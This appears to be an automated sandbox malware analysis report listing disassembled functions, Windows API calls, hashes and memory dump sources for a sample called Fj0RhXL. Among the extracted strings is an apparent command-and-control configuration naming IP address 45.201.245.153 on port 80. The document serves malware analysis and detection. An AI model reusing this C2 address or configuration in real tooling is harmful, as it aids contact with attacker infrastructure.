                                          • String ID: FriendlyName
                                          • API String ID: 841178590-3623505368
                                          • Opcode ID: 2ff6ef01a5a6d642ff3ccff207dbdcaef2b1ba4c053d45f6c661584ac22eeb96
                                          • Instruction ID: 048f2ab86f72978b37cf9979e9f8c341716121b646064531d24c3c740e958e04
                                          • Opcode Fuzzy Hash: 2ff6ef01a5a6d642ff3ccff207dbdcaef2b1ba4c053d45f6c661584ac22eeb96
                                          • Instruction Fuzzy Hash: 2E313A76700209EFDB00EBA9DC80EAEB7B9EF89700F148594F505EB254DB71E905CB60
                                          APIs
                                            • Part of subcall function 6C371472: _sprintf.LIBCMT ref: 6C3714BC
                                            • Part of subcall function 6C371472: _sprintf.LIBCMT ref: 6C3714E0
                                          • __CxxThrowException@8.LIBCMT ref: 6C3540AA
                                            • Part of subcall function 6C3E0FF1: KiUserExceptionDispatcher.NTDLL(?,?,6C3D5E3B,?,?,?,?,?,6C3D5E3B,?,6C442DBC,6C470A30), ref: 6C3E1033
                                          • _memset.LIBCMT ref: 6C3540C4
                                          • GetModuleFileNameA.KERNEL32(00000000,?,000000FF), ref: 6C3540D9
                                          • MessageBoxA.USER32(00000000,GameBegin,00000000,00000000), ref: 6C3540F4
                                            • Part of subcall function 6C3B2A72: SHDeleteKeyA.SHLWAPI(80000001,Software\Classes\.as,?,?,6C3ADE40), ref: 6C3B2A85
                                            • Part of subcall function 6C3B2A72: SHDeleteKeyA.SHLWAPI(80000001,Software\Classes\Astrolog.as,?,?,6C3ADE40), ref: 6C3B2A91
                                            • Part of subcall function 6C3665F4: _memset.LIBCMT ref: 6C36662D
                                            • Part of subcall function 6C3665F4: _memset.LIBCMT ref: 6C366643
                                            • Part of subcall function 6C366B34: _memset.LIBCMT ref: 6C366B68
                                            • Part of subcall function 6C3D2E33: _doexit.LIBCMT ref: 6C3D2E3F
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3623600753.000000006C351000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C350000, based on PE: true
                                          • Associated: 00000006.00000002.3623582983.000000006C350000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623659645.000000006C3FD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623695592.000000006C447000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623715559.000000006C449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623742172.000000006C46D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623760984.000000006C46E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C470000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C473000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C478000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C47C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C47E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C480000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623887245.000000006C483000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_6c350000_Fj0RhXL.jbxd
                                          Similarity
                                          • API ID: _memset$Delete_sprintf$DispatcherExceptionException@8FileMessageModuleNameThrowUser_doexit
                                          • String ID: GameBegin
                                          • API String ID: 2408732992-2407867525
                                          • Opcode ID: 3c4fbb30cd65917b31408c055be6bd9df96db2abe62718781812027b31e0af95
                                          • Instruction ID: 81729a5a974b29f01fc6c1fcf5e17035053537ceba3157692f16f2d82a890d84
                                          • Opcode Fuzzy Hash: 3c4fbb30cd65917b31408c055be6bd9df96db2abe62718781812027b31e0af95
                                          • Instruction Fuzzy Hash: AA21C8B0A012489FDF14EF728881DEDB6B8E71934DBA0043AE15593E45DB3585689FA3
                                          APIs
                                          • _malloc.LIBCMT ref: 03D9ABEC
                                            • Part of subcall function 03D9AB3E: __FF_MSGBANNER.LIBCMT ref: 03D9AB57
                                            • Part of subcall function 03D9AB3E: __NMSG_WRITE.LIBCMT ref: 03D9AB5E
                                            • Part of subcall function 03D9AB3E: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,03D9FCE2,00000000,00000001,00000000,?,03DA8D2E,00000018,03DB79F0,0000000C,03DA8DBE), ref: 03D9AB83
                                          • std::exception::exception.LIBCMT ref: 03D9AC21
                                          • std::exception::exception.LIBCMT ref: 03D9AC3B
                                          • __CxxThrowException@8.LIBCMT ref: 03D9AC4C
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true
                                          • Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: std::exception::exception$AllocateException@8HeapThrow_malloc
                                          • String ID: bad allocation
                                          • API String ID: 615853336-2104205924
                                          • Opcode ID: 706e7de1eabd2d9e812223c0766dea85538c148147047dec39e33261e2a8df89
                                          • Instruction ID: cb4e43a0a1100f0f0b632cf12e3d71254eda5584ec03c902151e6a73cc33e217
                                          • Opcode Fuzzy Hash: 706e7de1eabd2d9e812223c0766dea85538c148147047dec39e33261e2a8df89
                                          • Instruction Fuzzy Hash: F6F0F47B52031AABEF15FB69D820EAD76F9FF40608F14045BE416AB182DB70CA4597A0
                                          APIs
                                          • _malloc.LIBCMT ref: 02F07041
                                            • Part of subcall function 02F06F93: __FF_MSGBANNER.LIBCMT ref: 02F06FAC
                                            • Part of subcall function 02F06F93: __NMSG_WRITE.LIBCMT ref: 02F06FB3
                                            • Part of subcall function 02F06F93: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,02F0A080,00000000,00000001,00000000,?,02F0C1E0,00000018,02F17BF0,0000000C,02F0C270), ref: 02F06FD8
                                          • std::exception::exception.LIBCMT ref: 02F07076
                                          • std::exception::exception.LIBCMT ref: 02F07090
                                          • __CxxThrowException@8.LIBCMT ref: 02F070A1
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3622068823.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true
                                          • Associated: 00000006.00000002.3622068823.0000000002F1F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_2f00000_Fj0RhXL.jbxd
                                          Similarity
                                          • API ID: std::exception::exception$AllocateException@8HeapThrow_malloc
                                          • String ID: bad allocation
                                          • API String ID: 615853336-2104205924
                                          • Opcode ID: 61fdbd9ba64057525445389e4fd53de5263845125cf37029c9c4d14c278d4d2b
                                          • Instruction ID: e00e466ee7a969f81352b03c789acba9356bfc057124a776ae1e35f3ab2495a8
                                          • Opcode Fuzzy Hash: 61fdbd9ba64057525445389e4fd53de5263845125cf37029c9c4d14c278d4d2b
                                          • Instruction Fuzzy Hash: 35F02D31E0028D9ADB04FB95DD80E5EF7AB5B40BD4F500059DB05D60D0DBB0E650EF94
                                          APIs
                                          • lstrlenW.KERNEL32(?), ref: 02F06461
                                            • Part of subcall function 02F05E30: _memset.LIBCMT ref: 02F05E61
                                          • CreateThread.KERNEL32(00000000,00000000,02F06110,00000000,00000000,00000000), ref: 02F0648E
                                          • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02F0649C
                                          • CloseHandle.KERNEL32(?), ref: 02F064A9
                                          Strings
                                          • |p1:45.201.245.153|o1:80|t1:1|p2:45.201.245.153|o2:80|t2:1|p3:127.0.0.1|o3:80|t3:1|dd:1|cl:1|fz:, xrefs: 02F0646D
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3622068823.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true
                                          • Associated: 00000006.00000002.3622068823.0000000002F1F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_2f00000_Fj0RhXL.jbxd
                                          Similarity
                                          • API ID: CloseCreateHandleObjectSingleThreadWait_memsetlstrlen
                                          • String ID: |p1:45.201.245.153|o1:80|t1:1|p2:45.201.245.153|o2:80|t2:1|p3:127.0.0.1|o3:80|t3:1|dd:1|cl:1|fz:
                                          • API String ID: 1730619010-4171861867
                                          • Opcode ID: c36cedb35e40ead32920124f07d83d46102ae359b2f275f64e056a307373fc74
                                          • Instruction ID: d4b30d51e96d849a16cf35ffd071ef241462eefd1eb684d881458ea7ecff208b
                                          • Opcode Fuzzy Hash: c36cedb35e40ead32920124f07d83d46102ae359b2f275f64e056a307373fc74
                                          • Instruction Fuzzy Hash: 2EF08231D8161DBBE7105BD0AC4EF96B76CAB08FE1FD20910F7099A1C5CBB061208BA5
                                          APIs
                                          • setsockopt.WS2_32(?,0000FFFF,00000080,?,00000004), ref: 02F02D2C
                                          • CancelIo.KERNEL32(?), ref: 02F02D36
                                          • InterlockedExchange.KERNEL32(00000000,00000000), ref: 02F02D3F
                                          • closesocket.WS2_32(?), ref: 02F02D49
                                          • SetEvent.KERNEL32(00000001), ref: 02F02D53
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3622068823.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true
                                          • Associated: 00000006.00000002.3622068823.0000000002F1F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_2f00000_Fj0RhXL.jbxd
                                          Similarity
                                          • API ID: CancelEventExchangeInterlockedclosesocketsetsockopt
                                          • String ID:
                                          • API String ID: 1486965892-0
                                          • Opcode ID: 2059fc1cbb882312602514fe87fcc3ff98f0ca619ba269e27abe5a26d6a3f6ec
                                          • Instruction ID: e075c5372da4c05317a11ffeb561871f19a99a8ef4bd549ee92b8d7dd3e28da4
                                          • Opcode Fuzzy Hash: 2059fc1cbb882312602514fe87fcc3ff98f0ca619ba269e27abe5a26d6a3f6ec
                                          • Instruction Fuzzy Hash: 23F04F76940708AFD330DF94DC49F56B7B8FB89B51F904A59F68297680C7B0B9048BA0
                                          APIs
                                          • __floor_pentium4.LIBCMT ref: 03D811E9
                                          • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 03D81226
                                          • _memmove.LIBCMT ref: 03D81242
                                          • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 03D81255
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true
                                          • Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Virtual$AllocFree__floor_pentium4_memmove
                                          • String ID:
                                          • API String ID: 1828152804-0
                                          • Opcode ID: 9f6647e31bf256ed999d8fb68615ecd2ef7a567d73b1f71f5a2d9779c27cfc1c
                                          • Instruction ID: c86915aae15b3a3b722aa8e971745d301277a5d93772ef38d9c0b9fa42d8f4dc
                                          • Opcode Fuzzy Hash: 9f6647e31bf256ed999d8fb68615ecd2ef7a567d73b1f71f5a2d9779c27cfc1c
                                          • Instruction Fuzzy Hash: 6E219271A00709ABDB14EFA9D945B6EB7F8EF44B05F0085A9E849D2640E631B9148750
                                          APIs
                                          • __floor_pentium4.LIBCMT ref: 03D8112F
                                          • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 03D8115F
                                          • _memmove.LIBCMT ref: 03D8117B
                                          • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 03D81192
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true
                                          • Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Virtual$AllocFree__floor_pentium4_memmove
                                          • String ID:
                                          • API String ID: 1828152804-0
                                          • Opcode ID: a6f0ac45c2acd4d48dc04ac2879a1c29c7d1020b686d077778f1b2953135c6e2
                                          • Instruction ID: 1e07b8e36d1f3ceacc7e87f3a274b713433060ef9c757e0714af6267a90eed92
                                          • Opcode Fuzzy Hash: a6f0ac45c2acd4d48dc04ac2879a1c29c7d1020b686d077778f1b2953135c6e2
                                          • Instruction Fuzzy Hash: DC119371A00709EBDB10EFA9D985B6EFBF8EF04705F0085A9E959E2240E671A9588750
                                          APIs
                                          • OpenProcess.KERNEL32(00000400,00000000,03D85FA5,00000000), ref: 03D897A7
                                          • K32GetProcessImageFileNameW.KERNEL32(00000000,?,00000104), ref: 03D897C0
                                          • CloseHandle.KERNEL32(00000000), ref: 03D897CB
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true
                                          • Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Process$CloseFileHandleImageNameOpen
                                          • String ID:
                                          • API String ID: 3793065779-0
                                          • Opcode ID: 491131867f91bb30fc34a80bab424542c546b250dc5830c24d9206fa17bd6aa5
                                          • Instruction ID: 7dfb1e06a1bf1186c209aef70fff17bb8158a83f9245ee1d172c6b4b25b5fa8e
                                          • Opcode Fuzzy Hash: 491131867f91bb30fc34a80bab424542c546b250dc5830c24d9206fa17bd6aa5
                                          • Instruction Fuzzy Hash: A7016572700208DBDB15FF74EC99A7EB3B8DF84B10F50459DE84ADB244EF31AA169650
                                          APIs
                                          • RegisterClassA.USER32(6C47A988), ref: 6C353314
                                          • CreateWindowExA.USER32(00000000,Message Window,00CF0000,80000000,80000000,80000000,80000000,00000000,00000000,00000000), ref: 6C35333F
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3623600753.000000006C351000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C350000, based on PE: true
                                          • Associated: 00000006.00000002.3623582983.000000006C350000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623659645.000000006C3FD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623695592.000000006C447000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623715559.000000006C449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623742172.000000006C46D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623760984.000000006C46E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C470000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C473000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C478000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C47C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C47E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C480000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623887245.000000006C483000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_6c350000_Fj0RhXL.jbxd
                                          Similarity
                                          • API ID: ClassCreateRegisterWindow
                                          • String ID: Message Window
                                          • API String ID: 3469048531-1814804990
                                          • Opcode ID: 674f605da0270932fe4ce4eb37455b0dd3d2895ce86a928b57043734a05172b8
                                          • Instruction ID: e3344f971d5632bf4121b568f459f8fdd61b790b136d61ba617d16df1c0a102d
                                          • Opcode Fuzzy Hash: 674f605da0270932fe4ce4eb37455b0dd3d2895ce86a928b57043734a05172b8
                                          • Instruction Fuzzy Hash: 3BE0E5F0312610BEEF16EF60CC0AF327A7CEB06201B12AD19F90086210D671A8609F31
                                          APIs
                                          • VirtualAlloc.KERNEL32(00000000,?,00001000,00000040), ref: 032B0239
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3622375709.00000000032B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_32b0000_Fj0RhXL.jbxd
                                          Similarity
                                          • API ID: AllocVirtual
                                          • String ID:
                                          • API String ID: 4275171209-0
                                          • Opcode ID: 173a0753eb1870a11fb702d1a013be029f39be02b255bbe32865f3a9974466fd
                                          • Instruction ID: 3c0fb143d31e3f100cc5ec664f8a917e0b68f2904c8a2ff18401ece0ee3b4e77
                                          • Opcode Fuzzy Hash: 173a0753eb1870a11fb702d1a013be029f39be02b255bbe32865f3a9974466fd
                                          • Instruction Fuzzy Hash: 38A18B70A10606EFDB15CFA9C880AAEF7B4FF48354F1880A9E455E7351D770EA90CB90
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true
                                          • Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: _memmove$Timetime
                                          • String ID:
                                          • API String ID: 3063443389-0
                                          • Opcode ID: ef987c293cc5033b21798a8eed0c3a5b6c18b04f195945ec1c03bd0c1d97245c
                                          • Instruction ID: cc97bcdd0bad92bddfaeaf469ad841d66708f5fec1ac3b46f72258514978fb82
                                          • Opcode Fuzzy Hash: ef987c293cc5033b21798a8eed0c3a5b6c18b04f195945ec1c03bd0c1d97245c
                                          • Instruction Fuzzy Hash: C2519F7EB00201AFD715EF7DC8C0A6AB7A9FF44A14718866CD91E9B704DB31F8568790
                                          APIs
                                          • GetCurrentThreadId.KERNEL32 ref: 03D8313B
                                          • InterlockedExchange.KERNEL32(?,00000001), ref: 03D83153
                                          • GetCurrentThreadId.KERNEL32 ref: 03D831FF
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true
                                          • Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CurrentThread$ExchangeInterlocked
                                          • String ID:
                                          • API String ID: 4033114805-0
                                          • Opcode ID: 1080a9b7b31deb01c8548d77483133d066516028e4001fb1fae2d86b6a80225e
                                          • Instruction ID: 2b658892ddff07eeb2bedf6c82879cbf4af461767b2669afe693bbafe64b75dd
                                          • Opcode Fuzzy Hash: 1080a9b7b31deb01c8548d77483133d066516028e4001fb1fae2d86b6a80225e
                                          • Instruction Fuzzy Hash: 683134792006029FC718EF69C884A6AB3A8FF44F14B14C96DE85ECB615E731F846CB90
                                          APIs
                                          • InterlockedDecrement.KERNEL32(?), ref: 03D858FF
                                          • SysFreeString.OLEAUT32(00000000), ref: 03D85914
                                          • SysAllocString.OLEAUT32(03DB5B0C), ref: 03D85965
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true
                                          • Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: String$AllocDecrementFreeInterlocked
                                          • String ID:
                                          • API String ID: 3605875487-0
                                          • Opcode ID: 696dc668599398f677b02b8467c0373c5408f555131563705de217d92dafdc24
                                          • Instruction ID: 127f1ca49ea376844020200ad17e9080a2a867c15889f706e60d3a0629a93b5c
                                          • Opcode Fuzzy Hash: 696dc668599398f677b02b8467c0373c5408f555131563705de217d92dafdc24
                                          • Instruction Fuzzy Hash: 3431A0B6A01714DBDB20FF65E880B5AB7A9EF05F60F084619EC49DB340E774E901CB90
                                          APIs
                                          • GetCurrentThreadId.KERNEL32 ref: 02F0313B
                                          • InterlockedExchange.KERNEL32(?,00000001), ref: 02F03153
                                          • GetCurrentThreadId.KERNEL32 ref: 02F031FF
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3622068823.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true
                                          • Associated: 00000006.00000002.3622068823.0000000002F1F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_2f00000_Fj0RhXL.jbxd
                                          Similarity
                                          • API ID: CurrentThread$ExchangeInterlocked
                                          • String ID:
                                          • API String ID: 4033114805-0
                                          • Opcode ID: c130ad3ab3d7a0d459ef569be0ab9dc9de472e0fe1a25fadf18027307d08ff61
                                          • Instruction ID: b266241525eb76e598c540df0148b95ed7943b855a53c4bf0ef1245a33da33f8
                                          • Opcode Fuzzy Hash: c130ad3ab3d7a0d459ef569be0ab9dc9de472e0fe1a25fadf18027307d08ff61
                                          • Instruction Fuzzy Hash: E2317A71A006029FD728DF69C8C4A6AB3E5FF48784B10C56DEA1ACB695D731FC41CB90
                                          APIs
                                          • __floor_pentium4.LIBCMT ref: 02F011E9
                                          • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 02F01226
                                          • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 02F01255
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3622068823.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true
                                          • Associated: 00000006.00000002.3622068823.0000000002F1F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_2f00000_Fj0RhXL.jbxd
                                          Similarity
                                          • API ID: Virtual$AllocFree__floor_pentium4
                                          • String ID:
                                          • API String ID: 2605973128-0
                                          • Opcode ID: 0600b145c49b6e56f2c3ca18ab2ccef2df5a22fb70c841921cb96de4263f3aa7
                                          • Instruction ID: 9cc00ef2416c600d8f06ce98a9c0a89760f176106b477e17c2742febdd07bdd7
                                          • Opcode Fuzzy Hash: 0600b145c49b6e56f2c3ca18ab2ccef2df5a22fb70c841921cb96de4263f3aa7
                                          • Instruction Fuzzy Hash: C121C271F003099BDB149FADE985B6FFBF8EF44745F4089A9E94DD2680E730A8108B44
                                          APIs
                                          • __floor_pentium4.LIBCMT ref: 02F0112F
                                          • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 02F0115F
                                          • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 02F01192
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3622068823.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true
                                          • Associated: 00000006.00000002.3622068823.0000000002F1F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_2f00000_Fj0RhXL.jbxd
                                          Similarity
                                          • API ID: Virtual$AllocFree__floor_pentium4
                                          • String ID:
                                          • API String ID: 2605973128-0
                                          • Opcode ID: f305fc9b4e0d721398b1c08d0175a645e95381aaffe35d1e43c8e9082c0b2628
                                          • Instruction ID: 7083f12750b621d791e30ca5137aebc212da08529b5814fca96d1be6caa18456
                                          • Opcode Fuzzy Hash: f305fc9b4e0d721398b1c08d0175a645e95381aaffe35d1e43c8e9082c0b2628
                                          • Instruction Fuzzy Hash: 1B11B470E40309ABEB109FA9DC85B6FFBF8FF04785F008469EA5DD2280E73098148B54
                                          APIs
                                          • GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 03D94AC4
                                          • GdipDisposeImage.GDIPLUS(?), ref: 03D94AD8
                                          • GdipDisposeImage.GDIPLUS(?), ref: 03D94AFB
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true
                                          • Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Gdip$DisposeImage$BitmapCreateFromStream
                                          • String ID:
                                          • API String ID: 800915452-0
                                          • Opcode ID: 140e8d26d65424c6db67e7d812534c5b166dc63659001001fa1a91b2d2d18cfb
                                          • Instruction ID: ecf552a1a7441b51de5f610d51b6c3fec433310e4a8a6a13efa9ac038aa2ae62
                                          • Opcode Fuzzy Hash: 140e8d26d65424c6db67e7d812534c5b166dc63659001001fa1a91b2d2d18cfb
                                          • Instruction Fuzzy Hash: 62F08C7690022DEBCB10FF94E9448EFB7B8EB48715B04464EE905A7300E6308A068BE0
                                          APIs
                                          • EnterCriticalSection.KERNEL32(03DC1EA4), ref: 03D9479C
                                          • GdiplusStartup.GDIPLUS(03DC1EA0,?,?), ref: 03D947D5
                                          • LeaveCriticalSection.KERNEL32(03DC1EA4), ref: 03D947E6
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true
                                          • Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CriticalSection$EnterGdiplusLeaveStartup
                                          • String ID:
                                          • API String ID: 389129658-0
                                          • Opcode ID: e377f3ff04a90f6ccd0e0dfac50d380deef2353d15d6969cbeb6cb2b671fabd2
                                          • Instruction ID: 07a3b9efb96358dd518aea47317ca619ea046ae281548e2d5912866190cfb2d4
                                          • Opcode Fuzzy Hash: e377f3ff04a90f6ccd0e0dfac50d380deef2353d15d6969cbeb6cb2b671fabd2
                                          • Instruction Fuzzy Hash: 2FF04F7296021ADFDB00DEA1D85A7EBBBB8F701705F640259E51492242D7B246888AE1
                                          APIs
                                          • __getptd_noexit.LIBCMT ref: 02F0726B
                                            • Part of subcall function 02F09965: GetLastError.KERNEL32(00000001,00000000,02F07222,02F0701C,00000000,?,02F0A080,00000000,00000001,00000000,?,02F0C1E0,00000018,02F17BF0,0000000C,02F0C270), ref: 02F09969
                                            • Part of subcall function 02F09965: ___set_flsgetvalue.LIBCMT ref: 02F09977
                                            • Part of subcall function 02F09965: __calloc_crt.LIBCMT ref: 02F0998B
                                            • Part of subcall function 02F09965: DecodePointer.KERNEL32(00000000,?,02F0A080,00000000,00000001,00000000,?,02F0C1E0,00000018,02F17BF0,0000000C,02F0C270,00000000,00000000,?,02F09A89), ref: 02F099A5
                                            • Part of subcall function 02F09965: GetCurrentThreadId.KERNEL32 ref: 02F099BB
                                            • Part of subcall function 02F09965: SetLastError.KERNEL32(00000000,?,02F0A080,00000000,00000001,00000000,?,02F0C1E0,00000018,02F17BF0,0000000C,02F0C270,00000000,00000000,?,02F09A89), ref: 02F099D3
                                          • __freeptd.LIBCMT ref: 02F07275
                                            • Part of subcall function 02F09B27: TlsGetValue.KERNEL32(?,?,02F07821,00000000,02F17AE0,00000008,02F07886,?,?,?,02F17B00,0000000C,02F07941,?), ref: 02F09B48
                                            • Part of subcall function 02F09B27: TlsGetValue.KERNEL32(?,?,02F07821,00000000,02F17AE0,00000008,02F07886,?,?,?,02F17B00,0000000C,02F07941,?), ref: 02F09B5A
                                            • Part of subcall function 02F09B27: DecodePointer.KERNEL32(00000000,?,02F07821,00000000,02F17AE0,00000008,02F07886,?,?,?,02F17B00,0000000C,02F07941,?), ref: 02F09B70
                                            • Part of subcall function 02F09B27: __freefls@4.LIBCMT ref: 02F09B7B
                                            • Part of subcall function 02F09B27: TlsSetValue.KERNEL32(0000002A,00000000,?,02F07821,00000000,02F17AE0,00000008,02F07886,?,?,?,02F17B00,0000000C,02F07941,?), ref: 02F09B8D
                                          • ExitThread.KERNEL32 ref: 02F0727E
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3622068823.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true
                                          • Associated: 00000006.00000002.3622068823.0000000002F1F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
